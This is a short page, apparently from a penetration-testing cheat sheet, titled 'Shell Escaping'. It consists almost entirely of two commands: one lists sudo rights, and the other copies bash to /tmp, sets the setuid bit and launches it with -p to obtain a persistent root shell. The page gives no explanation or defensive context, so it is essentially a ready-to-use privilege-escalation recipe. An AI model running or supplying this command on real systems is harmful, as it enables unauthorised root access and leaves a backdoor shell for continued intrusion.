Shell Escaping

sudo -l
cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p

Last updated

Was this helpful?